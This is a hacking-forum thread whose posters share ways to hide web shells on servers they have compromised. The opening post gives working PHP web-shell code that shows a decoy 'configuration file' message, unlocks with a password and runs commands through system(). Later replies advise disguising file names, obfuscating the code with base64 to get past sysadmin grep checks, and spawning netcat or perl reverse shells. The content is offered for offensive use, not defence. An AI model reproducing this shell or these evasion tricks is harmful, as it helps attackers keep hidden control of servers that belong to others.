Hiding web-shells from the casual browser. - Web Application Security

peann

The last thing an attacker wants after all of his hard work of injecting a shell, is for the sys-admin to find it and remove it. This is my usual practice for hiding web-shells.

Name

The name shouldn't be something that immediately stands out to an admin casually browsing the files in the directory. Usually config.php, info.php, or install.php suffice.

Hidden password protection

On any shell I script - I liked to have it request a variable via the $_GET method, and if the value is empty or does not contain the correct password - then I usually either do not print the shell contents, and instead print a fake page - or else re-direct the user to the webroot.

Take the following simple shell for example. (Apologies for any code errors, doing this off the top of my head)


&lt;?php
session_start();
if(!isset($_SESSION&#91;'auth'&#93;)){
	if(!isset($_GET&#91;'login'&#93;)){
	 echo \"Configuration file&#46; Please do not delete this&#46;\";
	}
	else if($_GET&#91;'login'&#93; != \"s3cr3tp455w0rd\"){
	    echo \"Configuration file&#46; Please do not delete this&#46;\";
	 }
	 else{
	  $_SESSION&#91;'auth'&#93; = 1;
	  echo \"Logged in&#46;\";
          echo \"&lt;form action=\" &#46; $_SERVER&#91;'PHP_SELF'&#93; &#46; \" method=post&gt;\";
          echo \"Command&#58; &lt;input type=text name=cmd&gt;&lt;br /&gt;\";
          echo \"&lt;input type=submit value=Execute&gt;&lt;br /&gt;\";
          echo \"&lt;/form&gt;\";
          echo \"&lt;hr&gt;&lt;pre&gt;\";
          system($_POST&#91;'cmd'&#93;);
          echo \"&lt;/pre&gt;&lt;hr&gt;\";
	 }

?&gt;

Anyone who browses the file will simply see an error telling them to not delete the file. Usually in pre-configured CMS's, most web-developers won't actually delete the file because they will assume that it's legit. The only way the shell will display if the user passes a value to a variable called 'login', with the password 's3cr3tp455w0rd'. Obviously, you can change these to whatever you desire (and I implore you to do so!).

This is also great for protecting against any other hackers who may come across your shell. You can try obfuscate the shell's code if you like to further protect it against other hackers.

Maintaining control of a system is almost as hard, if not harder than gaining control! Hope this helps in future.

peann.

nu11byte

Mhm, very true. I usually name mine:
Apache config.php
contactus.php
etc. Just something along those lines.

Xin

I usually name mine , lib_mail.php or something that looks simillar to the other php files in the directory. Nice idea though i didnt think of putting a fake page. However it still wont protect against finding it server side which is what many sysadmins do. Such as searching and grepping for things like c99, r00t, 2.6.*, backconnect, shell etc and other common phrases that occur in shells.

peann

said:

I usually name mine , lib_mail.php or something that looks simillar to the other php files in the directory. Nice idea though i didnt think of putting a fake page. However it still wont protect against finding it server side which is what many sysadmins do. Such as searching and grepping for things like c99, r00t, 2.6.*, backconnect, shell etc and other common phrases that occur in shells.

You can obfuscate the code. I generally write my own shells, and then either use netcat to spawn a shell back to my account, or create a perl script to do so if netcat is not installed. Alot of those web-shells are bloated. The one above I posted works just fine.

CrashOverron

the password protecting is good against fellow hackers as well changing the default title if you're using a premade shell from someone else so someone cant just d0rk you but if keeping from the sysadmin then base64 or something similar will typically work

Howdy, Stranger!

Top Posters

Who's Online (0)